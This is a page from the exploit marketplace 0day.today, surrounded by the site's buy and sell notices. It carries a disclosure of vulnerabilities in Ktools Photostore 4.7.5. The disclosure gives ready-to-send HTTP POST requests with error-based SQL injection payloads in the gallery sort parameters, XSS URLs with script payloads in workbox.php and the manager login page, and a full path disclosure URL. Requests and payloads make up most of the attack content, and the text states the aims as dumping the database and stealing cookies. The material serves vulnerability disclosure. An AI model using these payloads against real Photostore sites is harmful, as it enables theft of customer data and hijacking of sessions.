0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ktools Photostore 4.7.5 - Multiple Vulnerabilities
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # Ktools Photostore <= 4.7.5 Multiple Vulnerabilities # Bug discovered by Yakir Wizman # Date 01/07/2016 # Affected versions prior to 4.7.5 # Vendor Homepage - http://www.ktools.net #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # Author will be not responsible for any damage. #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # About the Application: #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow: # # Sell various sizes or formats of the same photo. # Sell photos, vector art, zip files and more. # Sell videos PhotoStore Pro Only # Sell prints, artwork, products, packages, digital collections and more. # Built in shopping cart and ecommerce system to accept credit cards and/or check payments. # Email notifications to both you and the customer upon purchase. # Customers can instantly download after payment. # Customers can instantly download their files after payment. # Connects to PayPal and 2Checkout. # Built in credit system to allow your customers to buy credits. # Allow your members to upload and sell their photos and other media while you take a commission. # The vulnerabilities which are described bellow does not require any legitimate user to exploit them. # The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them. # A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability). # SQL Injection (error based) Proof-Of-Concept #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # SQL Injection (Severity is Critical) # The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query. # Request Data #1 is: POST /photostore/gallery/Objects/24/page1/ HTTP/1.1 Cache-Control: no-cache Referer: http://www.example.net/photostore/gallery/Objects/24/page1/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Language: en-us,en;q=0.5 Host: www.ktoolsdemos.net Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3 Accept-Encoding: gzip, deflate Content-Length: 221 Content-Type: application/x-www-form-urlencoded postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD] # Inserted payload for example: postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ### #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# ### # The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query. # Request Data #2 is: POST /photostore/gallery/Objects/24/page1/ HTTP/1.1 Cache-Control: no-cache Referer: http://server/photostore/gallery/Objects/24/page1/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Language: en-us,en;q=0.5 Host: server Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3 Accept-Encoding: gzip, deflate Content-Length: 57 Content-Type: application/x-www-form-urlencoded postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc # Inserted payload for example: postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc # Cross Site Scripting Proof—Of-Concept #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # XSS (Severity is Medium) # The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application # # In Order to exploit this vulnerability, the URL should be like the following examples: # # http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script> # http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden # Full path disclosure Proof-Of-Concept #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # FPD (Severity is low/info) # The vulnerable parameter is “photoID” in “productshot.php” file which is partially sanitized and therefor an attacker could exploit this only to full path disclosure. # # In order to exploit this vulnerability, the url should be like the following example: # # http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125 # 0day.today [2024-11-15] #